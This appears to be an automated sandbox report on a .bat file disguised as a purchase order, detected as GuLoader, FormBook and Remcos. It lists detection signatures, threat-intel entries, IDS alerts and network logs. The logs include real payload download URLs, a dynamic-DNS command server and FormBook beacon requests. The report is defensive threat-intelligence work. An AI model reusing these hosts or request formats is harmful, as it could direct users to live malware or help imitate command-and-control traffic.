Windows Analysis Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

Overview

General Information

Sample name:	PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Analysis ID:	1500456
MD5:	a7cf853aab7a489baa2e3fc8e31ab25f
SHA1:	b114e9292f9c733594bc058fbec8f7ed63bfc208
SHA256:	5f6652b2b1984430374890d518550109bcef83b980557b985e502e70e80a7392
Tags:	bat
Infos:

Detection

FormBook, GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected FormBook

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

Creates multiple autostart registry keys

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Obfuscated command line found

Queues an APC in another process (thread injection)

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses cmd line tools excessively to alter registry or file data

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,

17_2_00404423

Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2

Source:	Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe
Source:	Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_23D710F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,	17_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	18_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49738 -> 172.111.137.132:57484
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.137.132:57484 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 64.46.102.70:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80

Uses dynamic DNS services

Source: unknown

DNS query: name: iwarsut775laudrye2.duckdns.org

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 203.161.41.205 203.161.41.205

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49741 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 193.25.216.165:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.62.202:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Jouse4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: avocaldoperu.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Jouse1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: avocaldoperu.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Stevns179.mix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cpanel-adminhost.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wWdnBiepyw166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cpanel-adminhost.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1Host: www.ctorq.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.vendasnaweb1.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1Host: www.411divorce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.gtprivatewealth.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE= HTTP/1.1Host: www.katasoo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.martinminorgroup.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pbzm/?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s= HTTP/1.1Host: www.atlpicsstudios.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.openhandedvision.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /r9e8/?8le=9XPp_0_hUrF45X&4NZpb=NZnCwFpZhKq0sQLr3EYC0TyIV0Vt7qzpk8sJXmG0u+Dj16JHvnRy3RCRxkJB+yK1MPAIrV8029hJ5TdoPi+z2c1Lq4bOeIsIUJHbQyiTQ7hpVCcnWmpKoKk= HTTP/1.1Host: www.shabygreen.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: avocaldoperu.com
Source: global traffic	DNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: cpanel-adminhost.com
Source: global traffic	DNS traffic detected: DNS query: www.ctorq.net
Source: global traffic	DNS traffic detected: DNS query: www.vendasnaweb1.com
Source: global traffic	DNS traffic detected: DNS query: www.411divorce.com
Source: global traffic	DNS traffic detected: DNS query: www.gtprivatewealth.com
Source: global traffic	DNS traffic detected: DNS query: www.katasoo.com
Source: global traffic	DNS traffic detected: DNS query: www.martinminorgroup.com
Source: global traffic	DNS traffic detected: DNS query: www.atlpicsstudios.com
Source: global traffic	DNS traffic detected: DNS query: www.openhandedvision.com
Source: global traffic	DNS traffic detected: DNS query: www.shabygreen.top
Source: global traffic	DNS traffic detected: DNS query: www.kera333.org

Source: unknown

